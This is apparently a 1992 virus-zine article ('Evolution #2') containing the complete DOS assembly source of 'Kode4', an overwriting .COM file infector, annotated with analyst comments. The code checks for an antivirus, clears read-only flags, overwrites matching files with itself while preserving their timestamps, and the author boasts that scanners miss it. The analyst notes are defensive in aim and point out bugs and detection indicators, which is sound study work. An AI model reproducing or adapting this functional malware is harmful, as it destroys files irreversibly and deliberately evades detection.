ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92
Article Title: Kode 4 v1 Virus
Author: Soltan Griss

;######################################################################
;# Name: Kode4 version 1.0 (overwritting stage)
;# Author: Soltan Griss [YAM]
;#
;# Description: What this sucker does is very simple. it overwrites
;#              the first 46 bytes of all com files in the current
;#              directory, with it's own code... as of scanv93, this
;#              virus is undetectable..
;#
;#
;# Special Thanks go out to Data Disruptor.. If it were not for you i
;# would still be fucking lost!!!!
;#
;######################################################################

;----------------------------------------------------------------------
; Analyst notes (MASM/TASM-style 16-bit DOS .COM listing, Intel syntax).
; Everything below is read off the listing itself.
;
; Class:     non-resident overwriting file infector. The host's leading
;            bytes are written over and never read or saved first, so
;            an affected file cannot be disinfected; it has to be
;            restored from a known-good copy.
; Scope:     files in the current directory that match the filespec
;            "*.c*". The author's text says "com files", but the
;            pattern also matches other extensions beginning with 'c'.
; Size:      V_Length = last - start spans all of the code plus both
;            strings, so the body is considerably longer than the
;            "46 bytes" quoted in the description and inline comment.
; Artifacts: - the banner string at DATA lies inside start..LAST, so it
;              is part of the image written into each affected file
;              and can serve as a simple static indicator;
;            - the read-only attribute bit is cleared and no later
;              call sets it again;
;            - file date and time are read before the write and put
;              back afterwards, so timestamps do not reveal the
;              modification; compare content or hashes instead.
; Note:      no INT 21h result except the final find-next carry flag is
;            checked anywhere in the loop.
;----------------------------------------------------------------------

seg_a           segment byte public
                assume  cs:seg_a, ds:seg_a

                org     100h                    ; .COM image loads at offset 100h
V_Length        equ     last-start              ; size of the whole image (code + strings)

KODE4           proc    far

start           label   near
                                                ;Check for Virex installiation
                ; Probe call: AX=0FF0Fh through INT 21h, then test for a
                ; 0101h reply. The author attributes that reply to a
                ; resident "Virex" product; the listing only shows the
                ; call and the comparison. On a match the program exits
                ; without touching any file.
                mov     ax,0ff0fh
                int     21h
                cmp     ax,0101h                ;Abort if Virex Protection
                je      done                    ; present

                mov     ah,4Eh                  ;Find first Com file
                mov     dx,offset filename      ;use "*.com"
                                                ; NOTE(review): the string at
                                                ; 'filename' is "*.c*", not "*.com"
                int     21h

Back:
                ; Per-file loop. 9Eh is the file-name field of the default
                ; DTA (PSP:80h + 1Eh); the listing never relocates the DTA.
                mov     ah,43h                  ;get rid of read only
                mov     al,0                    ; AX=4300h: get attributes -> CX
                mov     dx,9eh
                int     21h
                mov     ah,43h
                mov     al,01                   ; AX=4301h: set attributes from CX
                and     cx,11111110b            ; clear bit 0 (read-only)
                int     21h

                mov     ax,3D01h                ;Open file for writing
                mov     dx,9Eh                  ;get file name from file DTA
                int     21h

                mov     bx,ax                   ;save handle in bx
                mov     ah,57h                  ;get time date
                mov     al,0                    ; AX=5700h: CX = time, DX = date
                int     21h

                push    cx                      ;put in stack for later
                push    dx

                ; The write starts at file offset 0 (freshly opened handle)
                ; and takes its data from DS:100h, the start of this image.
                mov     dx,100h                 ;Start writing at 100h
                mov     cl,v_length             ;write 46 bytes
                                                ; NOTE(review): only CL is loaded;
                                                ; CH still holds the high byte of the
                                                ; time word from AX=5700h, so the
                                                ; overwritten length is not constant
                                                ; from file to file
                mov     ah,40h                  ;Write Data into the file
                int     21h

                pop     dx                      ;Restore old dates and times
                pop     cx
                mov     ah,57h
                mov     al,01h                  ; AX=5701h: put original stamp back
                int     21h

                mov     ah,3Eh                  ;Close the file
                int     21h

                mov     ah,4Fh                  ;Find Next file
                int     21h
                jnc     Back                    ; carry set = no more matches

                ; After the last file: print the '$'-terminated banner.
                mov     ah,9h
                mov     dx,offset DATA
                int     21h

done:           int     20h                     ;Terminate Program

filename        db      "*.c*",0                ; search pattern (see Scope above)
DATA            db      " -=+ Kode4 +=-, The one and ONLY!$"

kode4           endp
LAST            label   near                    ; end marker used by V_Length
seg_a           ends
                end     start